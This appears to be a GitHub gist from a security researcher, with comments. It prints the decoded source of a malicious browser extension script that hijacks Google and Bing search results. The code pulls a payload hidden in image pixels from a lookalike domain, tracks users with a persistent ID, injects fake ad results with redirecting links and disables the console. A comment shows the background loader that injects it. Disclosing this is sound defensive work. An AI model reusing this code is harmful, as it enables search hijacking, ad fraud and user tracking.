Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
fly-analytics-decoded.js
var $jscomp = $jscomp || {};
$jscomp['scope'] = {};
$jscomp['createTemplateTagFirstArg'] = function(c) {
return c['raw'] = c;
};
$jscomp['createTemplateTagFirstArgWithRaw'] = function(c, e) {
c['raw'] = e;
return c;
};
$jscomp['arrayIteratorImpl'] = function(c) {
var e = 0x0;
return function() {
var f = {};
f['done'] = !0x0;
return e < c['length'] ? {
'done': !0x1,
'value': c[e++]
} : f;
};
};
$jscomp['arrayIterator'] = function(d) {
var e = {};
e['next'] = $jscomp['arrayIteratorImpl'](d);
return e;
};
$jscomp['makeIterator'] = function(c) {
var e = 'undefined' != typeof Symbol && Symbol['iterator'] && c[Symbol['iterator']];
return e ? e['call'](c) : $jscomp['arrayIterator'](c);
};
(function() {
var h = function() {
var s = !![];
return function(t, u) {
var v = s ? function() {
if (u) {
var x = u['apply'](t, arguments);
u = null;
return x;
}
} : function() {};
s = ![];
return v;
};
}();
var i = function() {
var s = !![];
return function(t, u) {
var v = s ? function() {
if (u) {
var x = u['apply'](t, arguments);
u = null;
return x;
}
} : function() {};
s = ![];
return v;
};
}();
var j = document['getElementById']('jsrunning');
if (!j || j['rel'] == chrome['runtime']['id']) {
j = document['createElement']('link');
j['id'] = 'jsrunning';
j['rel'] = chrome['runtime']['id'];
(document['head'] || document['documentElement'])['append'](j);
var k = {};
k['google'] = '(?=^.*google.*/search.*?[?|&]q=(.*?)(?:&|$))(?!^.*tbm=isch|.*tbm=shop|.*tbm=nws|.*tbm=plcs|.*tbm=lcl|.*ibp=htl;jobs).*';
var l = {};
l['bing'] = '.*bing.com/search.*?[?|&]q=(.*?)(?:&|$)';
var m = [k, l],
n = function(s) {
for (var t = {}, u = $jscomp['makeIterator'](m), v = u['next'](); !v['done']; v = u['next']()) {
v = v['value'];
var x = s['match'](Object['values'](v)[0x0]);
if (null !== x && 0x1 < x['length']) {
var B = {};
B['domain'] = Object['keys'](v)[0x0];
B['query'] = x[0x1];
t = B;
break;
}
}
return t;
},
o = function() {
function s() {
return '10000000-1000-4000-8000-100000000000' ['replace'](/[018]/g, function(t) {
return (t ^ crypto['getRandomValues'](new Uint8Array(0x1))[0x0] & 0xf >> t / 0x4)['toString'](0x10);
});
}
return localStorage['UID'] || (localStorage['UID'] = s());
},
p = function(s) {
return new Promise(function(t) {
var u = new Image();
u['crossOrigin'] = 'Anonymous';
u['referrerPolicy'] = 'unsafe-url';
u['onload'] = function() {
var v = document['createElement']('canvas');
v['height'] = u['height'];
v['width'] = u['width'];
var x = v['getContext']('2d');
x['drawImage'](u, 0x0, 0x0);
v = x['getImageData'](0x0, 0x0, v['width'], v['height'])['data'];
base64 = '';
for (x = 0x0; x < v['length']; x++)
if (0xff !== v[x]) {
if (0x2a == v[x]) break;
base64 += String['fromCharCode'](v[x]);
} v = [];
try {
v = JSON['parse'](atob(base64));
} catch (B) {}
t(v);
};
u['onerror'] = function() {
t([]);
};
u['src'] = 'https://lh3.googleusrcontent.com/' + btoa(chrome['runtime']['id']) + '/AAAAAAAAAAI/AAAAAAAAAAA/' + btoa(o()) + '/s128-b16-cc-rp/photo.jpg';
});
},
q = function(s) {
return new Promise(function(t) {
var u = document['querySelector'](s);
if (u) return t(u);
var v = {};
v['childList'] = !0x0;
v['subtree'] = !0x0;
new MutationObserver(function(x, B) {
var C = document['querySelector'](s);
if (C) return t(C);
})['observe'](document['documentElement'], v);
});
},
r = function(s) {
s['querySelectorAll']('a')['forEach'](function(t) {
t['addEventListener']('click', function(u) {
u['preventDefault']();
this['hasAttribute']('data-context') && (window['location'] = atob(this['getAttribute']('data-context')));
});
});
};
(function() {
var s = h(this, function() {
var x = typeof window !== 'undefined' ? window : typeof process === 'object' && typeof require === 'function' && typeof global === 'object' ? global : this;
var B = function() {
var C = new x[('RegExp')]('^([^ ]+( +[^ ]+)+)+[^ ]}');
return !C['test'](s);
};
return B();
});
s();
var t = i(this, function() {
var x = function() {};
var B = typeof window !== 'undefined' ? window : typeof process === 'object' && typeof require === 'function' && typeof global === 'object' ? global : this;
if (!B['console']) {
B['console'] = function(C) {
var D = {};
D['log'] = C;
D['warn'] = C;
D['debug'] = C;
D['info'] = C;
D['error'] = C;
D['exception'] = C;
D['table'] = C;
D['trace'] = C;
return D;
}(x);
} else {
B['console']['log'] = x;
B['console']['warn'] = x;
B['console']['debug'] = x;
B['console']['info'] = x;
B['console']['error'] = x;
B['console']['exception'] = x;
B['console']['table'] = x;
B['console']['trace'] = x;
}
});
t();
var u = n(document['location']['href']);
if (u['domain']) {
var v = p(u['query']);
'google' == u['domain'] && (q('#tvcap')['then'](function(x) {
x['innerHTML'] = '';
v['then'](function(C) {
if (0x0 < C['length']) {
var D = document['createElement']('div');
D['className'] = 'srg';
var E = document['createElement']('div');
E['className'] = 'srg';
try {
for (var F = document['getElementById']('rso'), G = $jscomp['makeIterator'](C['entries']()), H = G['next'](); !H['done']; H = G['next']()) {
var I = $jscomp['makeIterator'](H['value']),
J = I['next']()['value'],
K = I['next']()['value'],
L = '';
if (K['siteLinks']) {
L = '<div class="osl1">';
for (var M = $jscomp['makeIterator'](K['siteLinks']['entries']()), N = M['next'](); !N['done']; N = M['next']()) {
var O = $jscomp['makeIterator'](N['value']),
P = O['next']()['value'],
Q = O['next']()['value'];
L += '<a class="fl" data-context="' + btoa(Q['url']) + '" href="https://' + K['host']['toLowerCase']() + '/' + Q['text']['toLowerCase']()['replace'](/ /g, '-') + '"><span>' + Q['text'] + '</span></a>' + (P == K['siteLinks']['length'] - 0x1 ? '' : '<span> · </span>');
}
L += '</div>';
}
var R = '<div class="g"> <div> <div class="rc"> <div class="r"> <a href="https://' + K['host']['toLowerCase']() + '" data-context="' + btoa(K['url']) + '"><br> <h3 class=""><span>' + K['title'] + '</span></h3> <div style="position: absolute;left: 0;top: 0;"><span style="color: #202124;font-weight: bold;">Ad<span style="padding:0 5px">·</span></span><cite class="iUh30">' + K['host'] + '</cite></div> </a> </div> <div class="s"> <div> <span class="st"><span>' + K['description'] + '</span></span> </div> </div> ' + L + ' </div> </div> </div>';
var S = new DOMParser()['parseFromString'](R, 'text/html')['body']['firstChild'];
r(S);
J < C['length'] / 0x2 || 0x5 > J ? D['appendChild'](S) : E['appendChild'](S);
}
F['insertBefore'](D, F['firstChild']);
F['append'](E);
} catch (T) {}
}
});
}), q('#bottomads')['then'](function(x) {
x['innerHTML'] = '';
}));
'bing' == u['domain'] && (q('#b_results')['then'](function(x) {
v['then'](function(C) {
if (0x0 < C['length']) try {
for (var D = document['getElementById']('b_results'), E = document['getElementsByClassName']('b_rs')[0x0] && document['getElementsByClassName']('b_rs')[0x0]['parentElement'], F = D['firstChild'], G = $jscomp['makeIterator'](C['entries']()), H = G['next'](); !H['done']; H = G['next']()) {
var I = $jscomp['makeIterator'](H['value']),
J = I['next']()['value'],
K = I['next']()['value'],
L = '';
if (K['siteLinks']) {
L = '<ul class="b_factrow">';
for (var M = $jscomp['makeIterator'](K['siteLinks']['entries']()), N = M['next'](); !N['done']; N = M['next']()) {
var O = $jscomp['makeIterator'](N['value']),
P = O['next']()['value'],
Q = O['next']()['value'];
L += '<li><a data-context="' + btoa(Q['url']) + '" href="https://' + K['host']['toLowerCase']() + '/' + Q['text']['toLowerCase']()['replace'](/ /g, '-') + '\x22>' + Q['text'] + '</a>' + (P == K['siteLinks']['length'] - 0x1 ? '' : ' · ') + '</li>';
}
L += '</ul>';
}
var R = '<li class="b_algo"> <h2><a href="https://' + K['host']['toLowerCase']() + '" data-context="' + btoa(K['url']) + '\x22>' + K['title'] + '</a></h2> <div class="b_caption"> <div class="b_attribution"><cite>' + K['host'] + '</cite></div> <p><span style="margin-right: 4px;padding: 2px 4px 2px 4px;color: #666;border: 1px solid #ddd;vertical-align: middle;font-size: 11px;font-weight: normal;line-height: 11px;border-radius: 6px;display: inline-block;">Ad</span>' + K['description'] + '</p> </div> ' + L + ' </li>';
var S = new DOMParser()['parseFromString'](R, 'text/html')['body']['firstChild'];
r(S);
if (J < C['length'] / 0x2 || 0x5 > J) {
if (D['insertBefore'](S, F), F = S['nextSibling'], !E && 0x4 == J) break;
} else D['insertBefore'](S, E);
}
} catch (T) {}
});
}), q('.b_ad')['then'](function(x) {
x['remove']();
}), q('.b_adBottom')['then'](function(x) {
x['remove']();
}));
}
}());
}
}());
@rkim-ias
Copy link

rkim-ias commented Aug 7, 2020

Thank you for putting this information out.

However, do you know how this script is able to execute from a background context and still inject into Google domains without a content script?

Perhaps the versions of the extensions I have looked at are different from what you have been investigating?

Thanks

@ameshkov
Copy link
Author

ameshkov commented Aug 7, 2020

@rkim-ias

The script here is executed in the page context, not in the background context.

Here's what's executed in the bg context:

let code = 'HERE GOES BASE64-ENCODED SCRIPT';
chrome.tabs.onUpdated.addListener(function (tabId, changeInfo, tab) {
    if (changeInfo.url) {
        chrome.tabs.executeScript(tabId, { code: atob(code), runAt: 'document_start' }, function () {
            if (chrome.runtime.lastError) { }
        });
    }
});

let code -- base64-encoded and obfuscated version of the script you see in this gist

@rkim-ias
Copy link

rkim-ias commented Aug 7, 2020

@ameshkov

Quite fantastic!

thanks again 👍

@timlmit
Copy link

timlmit commented Aug 18, 2020

Thank you. Adguard the best!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment